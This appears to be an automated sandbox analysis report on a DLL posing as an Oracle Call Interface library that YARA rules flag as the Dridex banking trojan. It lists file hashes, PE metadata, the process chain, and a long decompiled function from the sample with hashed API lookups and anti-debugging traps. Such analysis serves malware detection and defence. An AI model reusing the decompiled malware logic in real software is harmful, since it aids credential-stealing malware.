Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.4.0.<./.P.i.d.>.......

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.24513602723487
Encrypted:	false
SSDEEP:	12288:I7+oXtLSfBiusoJGm+9JnHHNapijT2+KXAostH6LmWYYGOuh:M+oXtLSfBiVoJGjNa
MD5:	B7EF2E84C38B892A92DAFFA1CF79B2DC
SHA1:	72CB6C55844EB597F91ED0E344A76A040F2883A6
SHA-256:	5037295BF78701F84932B0E003DC5BAE82DD24C8C88F2CFA3EF1B8C38C156BE8
SHA-512:	D97E3AC086DAAB4BCAF8471149704DB2A8A5E6F010D0D3126744CBB51E82EDA4C246575F22123082B514DFE7C5326B1977D83805799D613147F309DCEE535A4F
Malicious:	false
Reputation:	low
Preview:	regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm*..j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.410465000893189
Encrypted:	false
SSDEEP:	384:8bf5K5KPv4EgnVVeeDze11NKZtjtT8Gpwe1b33SYd:EhKig/eeDzePNYtjSGpwetSY
MD5:	5A328D1BCB75D088428D8FBFC4F31E0D
SHA1:	E931C0C197B38575BDCEA151CB5F42250721DE8F
SHA-256:	5F9A3CDC8BFEDF1710693C4F00387FB64D144AF4336BBF12AC7A22C44E5EB122
SHA-512:	CA960CF2EE982A27EFD8464AE90FABD8ACB564F9BCBA2E94920B777D38AC1E3935A87257F16F3A2904C12F21292ECBB8FA7A47B766813FC057713F6E0E55F119
Malicious:	false
Reputation:	low
Preview:	regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..j...................................................................................................................................................................................................................................................................................................................................................HvLE.N......G.............D.....e=........................... ..hbin................p.\..,..........nk,.x@.j................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .x@.j....... ........................... .......Z.......................Root........lf......Root....nk .x@.j................................... ..............................DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.220126206743121
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	triage_dropped_file.dll
File size:	565248
MD5:	232a73868213c05f54359f7d7c5d349f
SHA1:	2de77f30b087dfb182e414c341c6d6426e752fd9
SHA256:	47738cc4c2025a2f4655695777fabde7c80bf272406b4dd89efbfab34ff5780b
SHA512:	4d01ebbf6745ba652109459634916b283c3fb00017f23e9b40aff690107a75b4348aebd920ef80a912b866e55b339547fb0ec151f446b8e5ddb6987147d63a33
SSDEEP:	12288:snYoMi8KFy86zc86boq67oy6zq86xoG6V2C6FoE69oI6Vo8mHo06zo8knoz5fU56:siI0+2OJIjTR
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004cd0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C34004 [Wed Dec 22 15:11:00 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	6c630f89c340001062a2ada6a2273a4d

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F30B4DD6431h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push ebx
push esi
and esp, FFFFFFF8h
sub esp, 00000080h
mov eax, dword ptr [ebp+08h]
mov ecx, 113CF852h
xor edx, edx
mov esi, dword ptr [esp+78h]
mov edi, esi
xor edi, 0342D826h
mov dword ptr [esp+78h], edi
mov byte ptr [esp+77h], 00000043h
mov dword ptr [esp+64h], 113CF852h
mov word ptr [esp+4Ah], FE51h
mov dword ptr [esp+34h], eax
mov dword ptr [esp+30h], ecx
mov dword ptr [esp+2Ch], edx
mov dword ptr [esp+28h], esi
call 00007F30B4DD9CE3h
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
mov edi, eax
add edi, esi
mov ebx, dword ptr [esp+68h]
mov dword ptr [esp+24h], eax
mov eax, dword ptr [esp+00h]

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x80f49	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x80fac	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x1174	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x66be	0x7000	False	0.380684988839	data	4.37366562379	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x7916e	0x7a000	False	0.283385229892	data	7.33168362555	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x82000	0x634f	0x5000	False	0.247509765625	data	5.01040935971	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x2f0	0x1000	False	0.09033203125	data	0.788492020975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x1d9a	0x2000	False	0.242309570312	data	4.16996433109	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x89060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
KERNEL32.dll	IsDebuggerPresent, GetModuleHandleW, GetModuleFileNameW, CloseHandle, GetFileSize, OutputDebugStringA
WS2_32.dll	WSACleanup
ADVAPI32.dll	QueryServiceStatusEx, AccessCheck, RegCloseKey
USER32.dll	GetWindowTextA

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4388 Parent PID: 1444

General

Start time:	20:31:21
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll"
Imagebase:	0x10c0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2920 Parent PID: 4388

General

Start time:	20:31:21
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5340 Parent PID: 2920

General

Start time:	20:31:22
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.669892514.000000006E7C1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.672146465.000000006E7C1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.703106750.000000006E7C1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5112 Parent PID: 5340

General

Start time:	20:31:25
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 684
Imagebase:	0x1100000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4388 Parent PID: 1444 loaddll32.exeCOMMON

Executed Functions

Function 6E7D0730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E7D0730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e7dd1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6E7D361C(0x30);
					 *0x6e7dd1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E7D3698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E7D306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e7dd1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E7D0FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e7dd1f8 + 0xb)) = _t162;
					_t363 = E6E7D306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e7dd1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E7D0730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e7dbce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E7CF584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E7CF828(_t429 + 0x24, E6E7CF4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E7CF4BC(_t429 + 0x24, E6E7CF4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E7D5580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E7CF654(_t429 + 0x20);
							E6E7D55B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6E7D5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E7CDFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E7D55B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6E7D5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E7CDFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E7D55B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6E7D5864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E7CDFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E7CCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E7D5558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E7CCFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E7D5558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E7CCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E7D5558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E7CCFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E7D5558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E7CCFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E7D5558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E7CCFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E7D5558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e7dd1f8 + 0x24)) = _t189;
							_t190 = E6E7D1030(0xffffffffffffffff);
							_t320 =  *0x6e7dd1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e7dd1f8 + 0x2c)) = E6E7D10A4(0x6e7dd1f8, 0xffffffffffffffff);
								L78:
								if(E6E7D306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e7dd1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E7D306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e7dd1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E7D35F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E7D35F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E7CF584(_t429 + 0x18c, _t206);
								_t411 = E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E7CF654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E7CF4BC(_t429 + 0x18c, 0);
								_t213 = E6E7CF4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E7D35F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E7CF4BC(_t429 + 0x18c, 0);
								E6E7CDF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E7D306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E7CDFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E7D306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E7CE06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E7D4FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E7CE8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E7CDFA4(_t429 + 0x1b8);
								E6E7CDFA4(_t429 + 0x1b0);
								E6E7CF654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E7CBB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e7dd1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E7CBB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E7D35F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E7D35F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E7CF584(_t429 + 0x3c, _t262);
						_t265 = E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E7CF654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E7CF4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E7CF4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E7D35F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E7CF4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E7D306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E7D35F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E7D0FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
